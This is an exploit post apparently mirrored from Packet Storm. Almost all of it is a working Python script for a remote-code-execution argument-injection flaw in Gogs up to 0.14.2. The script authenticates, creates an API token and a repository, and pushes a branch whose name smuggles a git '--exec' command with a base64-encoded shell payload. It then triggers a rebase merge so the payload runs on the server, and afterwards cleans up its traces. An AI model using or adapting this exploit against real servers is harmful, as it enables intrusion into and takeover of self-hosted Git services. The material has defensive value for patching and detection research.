Share
## https://sploitus.com/exploit?id=PACKETSTORM:223338
==================================================================================================================================
    | # Title     : Gogs Git Rebase Argument Injection RCE                                                                           |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://github.com/gogs/gogs                                                                                     |
    ==================================================================================================================================
    
    [+] Summary    :  This Python script is an exploit framework targeting an argument injection vulnerability in Gogs reported as GHSA-qf6p-p7ww-cwr9 in Gogs <= 0.14.2 and <= 0.15.0+dev.
    
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import os
    import re
    import json
    import tempfile
    import shutil
    import subprocess
    import urllib.parse
    from typing import Optional, Dict, List, Tuple
    from html.parser import HTMLParser
    
    import requests
    from requests.exceptions import ConnectionError, Timeout
    class CSRFExtractor(HTMLParser):
        """Extract CSRF token from HTML response"""
        def __init__(self):
            super().__init__()
            self.csrf_token = None
    
        def handle_starttag(self, tag, attrs):
            if tag == 'input':
                attrs_dict = dict(attrs)
                if attrs_dict.get('name') == '_csrf':
                    self.csrf_token = attrs_dict.get('value')
    class GogsExploit:
        """Gogs Git Rebase Argument Injection RCE Exploit"""
        COMMIT_TO_VERSION = {
            '5dcb6c64bdf61e38dbdbb941c1d69789c560d0fb': '0.14.2',
            'f5c8030c1fd936f3e0e9f774e3c7c39fd102f56f': '0.14.1',
            '36c26c4ccc3ca0339db53eb1fa41e4e86b55163d': '0.14.0',
            'd958a47a0e9d8747e399c687fdb3ec64a3b1a736': '0.13.4',
            '5084b4a9b77a506f5e287e82e945e1c6882b827a': '0.13.3',
            '593c7b6db601c68d16b2fb9a7e1194cb816f5efb': '0.13.2',
            '0c40e600a275d490481cfeea53705810fbe94d9b': '0.13.1',
            '8c21874c00b6100d46b662f65baeb40647442f42': '0.13.0',
            'c9fba3cb30af0789fcf89098dfcb8f2286ee7d3b': '0.12.11',
            '1ce5171ae170750298c150874e718740dd7ef69f': '0.12.10',
            '012a1ba19ed2f8f5185be4254f655ba6c4b34db2': '0.12.9',
            '7f8799c01f264eb7770766621fb68debee414b68': '0.12.8',
            'd06ba7e527fcc462aecdb660ce001e87d94f024c': '0.12.7',
            '26395294bdef382b577fd60234e5bb14f4090cc8': '0.12.6'
        }
        def __init__(self, target_url: str, username: str, password: str,
                     exploit_method: str = 'own_repo', repo_owner: Optional[str] = None,
                     repo_name: Optional[str] = None, enable_rebase: bool = True,
                     payload: str = '', ssl: bool = False, wfs_delay: int = 30):
            self.target_url = target_url.rstrip('/')
            self.username = username
            self.password = password
            self.exploit_method = exploit_method
            self.repo_owner = repo_owner
            self.repo_name = repo_name
            self.enable_rebase = enable_rebase
            self.payload = payload
            self.ssl = ssl
            self.wfs_delay = wfs_delay
            self.session = requests.Session()
            self.api_token = None
            self.need_cleanup = False
            self.tmpdir = None
            self.repo_path = None
            self.malicious_branch = None
            self.feature_branch = None
            self.payload_file = None
            self.bat_file = None
            self.payload_content = None
            self.pr_number = None
            self.default_branch = 'master'
        def _normalize_uri(self, *parts) -> str:
            """Normalize URI by joining parts"""
            return '/'.join(str(p).strip('/') for p in parts if p)
        def _request(self, method: str, path: str, **kwargs) -> Optional[requests.Response]:
            """Make HTTP request with proper URI construction"""
            url = f"{self.target_url}{path}" if path.startswith('/') else f"{self.target_url}/{path}"
            try:
                return self.session.request(method, url, timeout=30, verify=self.ssl, **kwargs)
            except (ConnectionError, Timeout) as e:
                print(f"Request failed: {e}")
                return None
        def _extract_csrf(self, response: requests.Response) -> str:
            """Extract CSRF token from HTML response"""
            if not response:
                raise ValueError("No response to extract CSRF from")
            parser = CSRFExtractor()
            parser.feed(response.text)
            if not parser.csrf_token:
                raise ValueError("CSRF token not found in response")
            return parser.csrf_token
        def _basic_auth(self) -> str:
            """Create Basic authentication header"""
            import base64
            credentials = f"{self.username}:{self.password}"
            encoded = base64.b64encode(credentials.encode()).decode()
            return f"Basic {encoded}"
        def _git_available(self) -> bool:
            """Check if git is installed"""
            try:
                subprocess.run(['git', '--version'], capture_output=True, check=True)
                return True
            except (subprocess.CalledProcessError, FileNotFoundError):
                return False
        def _run_git(self, args: List[str], cwd: Optional[str] = None) -> Tuple[str, bool]:
            """Run git command and return (output, success)"""
            env = {'GIT_TERMINAL_PROMPT': '0'}
            try:
                result = subprocess.run(
                    ['git'] + args, cwd=cwd, env=env,
                    capture_output=True, text=True, check=False
                )
                if result.returncode != 0:
                    print(f"Git {' '.join(args)} failed: {result.stderr.strip()}")
                    return result.stderr, False
                return result.stdout, True
            except Exception as e:
                print(f"Git error: {e}")
                return str(e), False
        def check(self) -> Tuple[bool, str]:
            """Check if target is vulnerable"""
            res = self._request('GET', '/')
            if not res:
                return False, "Target did not respond"
            if not re.search(r'<meta +name="author" +content="Gogs"', res.text):
                return False, "Target does not appear to be running Gogs"
            version = None
            hash_match = re.search(r'gogs\.min\.css\?v=([a-f0-9]{40})', res.text)
            if hash_match:
                commit_hash = hash_match.group(1)
                version = self.COMMIT_TO_VERSION.get(commit_hash)
            if version:
                ver_parts = list(map(int, version.split('.')))
                if ver_parts <= [0, 14, 2]:
                    return True, f"Gogs {version} detected (vulnerable)"
                else:
                    return False, f"Gogs {version} detected (not vulnerable)"
            return True, "Gogs detected, but could not determine version"
        def _gogs_login(self) -> None:
            """Login to Gogs web interface"""
            res = self._request('POST', '/user/login',
                               data={'user_name': self.username, 'password': self.password},
                               allow_redirects=False)
            if not res or res.status_code != 302:
                raise Exception("Login failed - check credentials")
    
        def _create_api_token(self) -> None:
            """Create API token for authenticated requests"""
            preflight = self._request('GET', '/api/v1')
            if not preflight:
                raise Exception("Gogs API not responding")
            import base64
            auth_header = self._basic_auth()
            import random
            import string
            token_name = f"msf_{''.join(random.choices(string.ascii_lowercase, k=8))}"
            res = self._request('POST', f'/api/v1/users/{self.username}/tokens',
                               headers={'Authorization': auth_header},
                               json={'name': token_name})
            if not res or res.status_code != 201:
                raise Exception(f"API token creation failed (HTTP {res.status_code if res else 'None'})")
            self.api_token = res.json()['sha1']
            print(f"[*] API token created: {self.api_token[:10]}...")
        def _api_request(self, method: str, path: str, data: Optional[Dict] = None) -> Optional[requests.Response]:
            """Make authenticated API request"""
            headers = {'Authorization': f'token {self.api_token}'}
            if data:
                return self._request(method, path, headers=headers, json=data)
            return self._request(method, path, headers=headers)
        def _create_repo(self) -> None:
            """Create a new repository"""
            import random
            import string
            repo_name = f"{''.join(random.choices(string.ascii_lowercase, k=4))}-{''.join(random.choices(string.ascii_lowercase, k=4))}"
            self.repo_name = repo_name
            self.repo_path = f"{self.username}/{self.repo_name}"
            res = self._api_request('POST', '/api/v1/user/repos',
                                   {'name': repo_name, 'private': True, 'default_branch': 'master'})
            if not res or res.status_code != 201:
                raise Exception(f"Repo creation failed: {res.status_code if res else 'None'}")
        def _enable_rebase_merge(self) -> None:
            """Enable rebase merge in repository settings"""
            res = self._request('POST', f'/{self.repo_path}/settings',
                               data={'action': 'advanced', 'enable_pulls': 'on', 'pulls_allow_rebase': 'on'},
                               allow_redirects=False)
            if not res or res.status_code not in [200, 302]:
                raise Exception("Failed to enable rebase merge")
        def _validate_existing_repo(self) -> None:
            """Validate existing repository is accessible"""
            res = self._api_request('GET', f'/api/v1/repos/{self.repo_path}')
            if not res or res.status_code != 200:
                raise Exception(f"Repository {self.repo_path} not found or not accessible")
            repo_info = res.json()
            self.default_branch = repo_info.get('default_branch', 'master')
            print(f"[*] Default branch: {self.default_branch}")
        def _try_enable_rebase(self) -> None:
            """Try to enable rebase merge in existing repository"""
            print("[*] Attempting to enable rebase merge in repository settings")
            settings_uri = self._normalize_uri(self.repo_path, 'settings')
            res = self._request('GET', f'/{settings_uri}')
            if not res or res.status_code != 200:
                print("[-] Could not access repository settings (may require repo admin)")
                return
            csrf = self._extract_csrf(res)
            res = self._request('POST', f'/{settings_uri}',
                               data={'_csrf': csrf, 'action': 'advanced',
                                     'enable_pulls': 'on', 'pulls_allow_rebase': 'on'},
                               allow_redirects=False)
            if res and res.status_code in [200, 302]:
                print("[+] Rebase merge enabled")
            else:
                print("[-] Could not enable rebase merge")
        def _build_clone_url(self) -> str:
            """Build git clone URL with credentials"""
            user_enc = urllib.parse.quote(self.username, safe='')
            pass_enc = urllib.parse.quote(self.password, safe='')
            from urllib.parse import urlparse
            parsed = urlparse(self.target_url)
            authority = f"{parsed.hostname}:{parsed.port}" if parsed.port else parsed.hostname
            scheme = 'https' if self.ssl else 'http'
            repo_path = self.repo_path.rstrip('/')
            return f"{scheme}://{user_enc}:{pass_enc}@{authority}/{repo_path}.git"
        def _setup_branches_via_git(self) -> None:
            """Setup branches using local git"""
            self.tmpdir = tempfile.mkdtemp(prefix='msf_gogs_')
            workdir = os.path.join(self.tmpdir, 'work')
            clone_url = self._build_clone_url()
            if self.exploit_method == 'own_repo':
                self._run_git(['init', workdir])
                self._run_git(['remote', 'add', 'origin', clone_url], workdir)
            else:
                self._run_git(['clone', clone_url, workdir])
            import random
            import string
            self._run_git(['config', 'user.email', f"{''.join(random.choices(string.ascii_lowercase, k=8))}@example.com"], workdir)
            self._run_git(['config', 'user.name', ''.join(random.choices(string.ascii_lowercase, k=8))], workdir)
            if self.exploit_method == 'own_repo':
                with open(os.path.join(workdir, 'README.md'), 'w') as f:
                    f.write(f"# {self.repo_name}\n")
                self._run_git(['add', '.'], workdir)
                self._run_git(['commit', '-m', 'init'], workdir)
                self._run_git(['push', '-u', 'origin', 'master'], workdir)
            self.feature_branch = f"feature-{''.join(random.choices(string.ascii_lowercase, k=6))}"
            self._run_git(['checkout', '-b', self.feature_branch], workdir)
            with open(os.path.join(workdir, 'feature.txt'), 'w') as f:
                f.write(''.join(random.choices(string.ascii_lowercase, k=8)))
            self._run_git(['add', '.'], workdir)
            self._run_git(['commit', '-m', 'feature'], workdir)
            self._run_git(['push', 'origin', self.feature_branch], workdir)
            base_branch = 'master' if self.exploit_method == 'own_repo' else self.default_branch
            self._run_git(['checkout', base_branch], workdir)
            with open(os.path.join(workdir, 'diverge.txt'), 'w') as f:
                f.write(''.join(random.choices(string.ascii_lowercase, k=8)))
            import base64
            if self.payload:
                if 'win' in self.payload.lower():
                    import random
                    rand_name = ''.join(random.choices(string.ascii_lowercase, k=6))
                    self.payload_content = self.payload
                    self.payload_file = f".{rand_name}"
                    self.bat_file = f".{rand_name}.bat"
                    self.malicious_branch = f"--exec=sh${{IFS}}{self.payload_file}"
                    with open(os.path.join(workdir, self.payload_file), 'w') as f:
                        f.write(f"cmd.exe //c {self.bat_file} </dev/null >/dev/null 2>&1 &\n")
                    with open(os.path.join(workdir, self.bat_file), 'w') as f:
                        f.write(self.payload_content + "\n")
                else:
                    wrapped = f"({self.payload}) </dev/null >/dev/null 2>&1 &"
                    b64 = base64.b64encode(wrapped.encode()).decode()
                    padding = 0
                    while '//' in b64 and padding < 50:
                        padding += 1
                        b64 = base64.b64encode((' ' * padding + wrapped).encode()).decode()
                    self.malicious_branch = f"--exec=echo${{IFS}}{b64}|base64${{IFS}}-d|sh"
            self._run_git(['add', '.'], workdir)
            self._run_git(['commit', '-m', 'diverge'], workdir)
            self._run_git(['push', 'origin', f"HEAD:refs/heads/{self.malicious_branch}"], workdir)
            print(f"[+] Malicious branch: {self.malicious_branch}")
            print(f"[+] Feature branch: {self.feature_branch}")
        def _create_pull_request(self) -> str:
            """Create pull request for the feature branch"""
            encoded_branch = urllib.parse.quote(self.malicious_branch, safe='')
            compare_uri = f"/{self.repo_path}/compare/{encoded_branch}...{self.feature_branch}"
            import random
            import string
            res = self._request('POST', compare_uri,
                               data={'title': ''.join(random.choices(string.ascii_lowercase, k=6)),
                                     'content': '', 'assignee_id': '0', 'milestone_id': '0'},
                               allow_redirects=False)
            if not res:
                raise Exception("Compare page unreachable")
            if res.status_code in [302, 303]:
                location = res.headers.get('Location', '')
                pr_num = location.rstrip('/').split('/')[-1]
                if pr_num.isdigit():
                    return pr_num
            res = self._api_request('GET', f'/api/v1/repos/{self.repo_path}/pulls?state=open')
            if res and res.status_code == 200:
                pulls = res.json()
                if pulls:
                    return str(pulls[-1]['number'])
            raise Exception("PR creation failed")
        def _trigger_rebase_merge(self) -> None:
            """Trigger the rebase merge to execute payload"""
            merge_uri = f"/{self.repo_path}/pulls/{self.pr_number}/merge"
            pr_uri = f"/{self.repo_path}/pulls/{self.pr_number}"
            res = self._request('GET', f'/{pr_uri}')
            if not res:
                raise Exception("Could not load PR page")
            csrf = self._extract_csrf(res)
            self._request('POST', f'/{merge_uri}',
                         params={'merge_style': 'rebase_before_merging'},
                         data={'_csrf': csrf, 'commit_description': ''},
                         timeout=self.wfs_delay)
        def _cleanup_own_repo(self) -> None:
            """Delete the temporary repository"""
            print(f"[*] Cleaning up - deleting repository {self.repo_name}")
            self._api_request('DELETE', f'/api/v1/repos/{self.repo_path}')
            verify = self._api_request('GET', f'/api/v1/repos/{self.repo_path}')
            if verify and verify.status_code == 404:
                print(f"[+] Repository {self.repo_name} deleted")
            else:
                print(f"[-] Repository may still exist. Delete {self.repo_path} manually.")
        def _delete_remote_branches(self) -> None:
            """Delete malicious and feature branches from existing repo"""
            if not self.tmpdir:
                return
            workdir = os.path.join(self.tmpdir, 'work')
            if not os.path.isdir(workdir):
                return
            if self.malicious_branch:
                print(f"[*] Deleting malicious branch from {self.repo_path}")
                _, success = self._run_git(['push', 'origin', '--delete', f'refs/heads/{self.malicious_branch}'], workdir)
                if success:
                    print("[+] Malicious branch deleted")
                else:
                    print(f"[-] Could not delete malicious branch. Delete it manually from {self.repo_path}")
            if self.feature_branch:
                print(f"[*] Deleting feature branch from {self.repo_path}")
                _, success = self._run_git(['push', 'origin', '--delete', self.feature_branch], workdir)
                if success:
                    print("[+] Feature branch deleted")
                else:
                    print(f"[-] Could not delete feature branch from {self.repo_path}")
        def _close_pull_request(self) -> None:
            """Close the pull request"""
            if not self.pr_number:
                return
            pr_page = f"/{self.repo_path}/pulls/{self.pr_number}"
            res = self._request('GET', pr_page)
            if not res:
                print(f"[-] Could not load PR page to close PR #{self.pr_number}")
                return
            try:
                csrf = self._extract_csrf(res)
            except ValueError:
                print(f"[-] Could not find CSRF token to close PR #{self.pr_number}")
                return
            comment_uri = f"/{self.repo_path}/issues/{self.pr_number}/comments"
            res = self._request('POST', comment_uri,
                               data={'_csrf': csrf, 'status': 'close', 'content': ''})
    
            if res and res.status_code in [200, 302]:
                print(f"[+] PR #{self.pr_number} closed")
            else:
                print(f"[-] Could not close PR #{self.pr_number}")
        def _cleanup_existing_repo(self) -> None:
            """Clean up artifacts from existing repository"""
            print(f"[*] Cleaning up artifacts from {self.repo_path}")
            self._delete_remote_branches()
            self._close_pull_request()
        def cleanup(self) -> None:
            """Clean up resources"""
            if self.need_cleanup:
                if self.exploit_method == 'own_repo':
                    self._cleanup_own_repo()
                else:
                    self._cleanup_existing_repo()
            if self.tmpdir and os.path.isdir(self.tmpdir):
                shutil.rmtree(self.tmpdir)
                print("[*] Local temp directory cleaned up")
            if self.api_token:
                print("[!] API token persists on the target (Gogs API does not support token deletion)")
        def exploit(self) -> bool:
            """Execute the exploit"""
            if not self._git_available():
                print("[-] Local git installation required but not found")
                return False
            if self.exploit_method == 'existing_repo':
                if not self.repo_owner or not self.repo_name:
                    print("[-] REPO_OWNER and REPO_NAME required for existing_repo method")
                    return False
                self.repo_path = f"{self.repo_owner}/{self.repo_name}"
            print(f"[*] Executing exploit with payload: {self.payload[:50]}...")
            print(f"[*] Authenticating as \"{self.username}\"")
            self._create_api_token()
            self._gogs_login()
            print("[+] Authenticated")
            if self.exploit_method == 'own_repo':
                self._create_repo()
                self.need_cleanup = True
                print(f"[+] Repository '{self.repo_name}' created")
                print("[*] Enabling rebase merge in repository settings")
                self._enable_rebase_merge()
                print("[+] Rebase merge enabled")
            else:
                print(f"[*] Using existing repository \"{self.repo_path}\"")
                self._validate_existing_repo()
                self.need_cleanup = True
                if self.enable_rebase:
                    self._try_enable_rebase()
                else:
                    print("[*] Assuming rebase merge is already enabled")
            print("[*] Pushing branches via git")
            self._setup_branches_via_git()
            print("[+] Branches pushed")
            print("[*] Creating pull request")
            self.pr_number = self._create_pull_request()
            print(f"[+] PR #{self.pr_number} created")
            print("[*] Triggering rebase merge")
            self._trigger_rebase_merge()
            print("[+] Rebase merge triggered, waiting for shell...")
            return True
    def main():
        """Example usage"""
        import argparse
        parser = argparse.ArgumentParser(description='Gogs Git Rebase Argument Injection RCE')
        parser.add_argument('url', help='Target Gogs URL (e.g., http://localhost:3000)')
        parser.add_argument('-u', '--username', required=True, help='Gogs username')
        parser.add_argument('-p', '--password', required=True, help='Gogs password')
        parser.add_argument('-m', '--method', default='own_repo', choices=['own_repo', 'existing_repo'],
                           help='Exploit method')
        parser.add_argument('--repo-owner', help='Repository owner (for existing_repo)')
        parser.add_argument('--repo-name', help='Repository name (for existing_repo)')
        parser.add_argument('--payload', required=True, help='Command payload to execute')
        parser.add_argument('--ssl', action='store_true', help='Use SSL/TLS')
        parser.add_argument('--wfs-delay', type=int, default=30, help='Wait time for shell')
        args = parser.parse_args()
        exploit = GogsExploit(
            target_url=args.url,
            username=args.username,
            password=args.password,
            exploit_method=args.method,
            repo_owner=args.repo_owner,
            repo_name=args.repo_name,
            payload=args.payload,
            ssl=args.ssl,
            wfs_delay=args.wfs_delay
        )
        try:
            vulnerable, msg = exploit.check()
            print(f"[*] Check result: {msg}")
            if not vulnerable:
                print("[-] Target does not appear vulnerable")
                return
            success = exploit.exploit()
            if success:
                print("[+] Exploit completed successfully")
            else:
                print("[-] Exploit failed")
        except KeyboardInterrupt:
            print("\n[*] Interrupted by user")
        except Exception as e:
            print(f"[-] Error: {e}")
        finally:
            exploit.cleanup()
    if __name__ == '__main__':
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================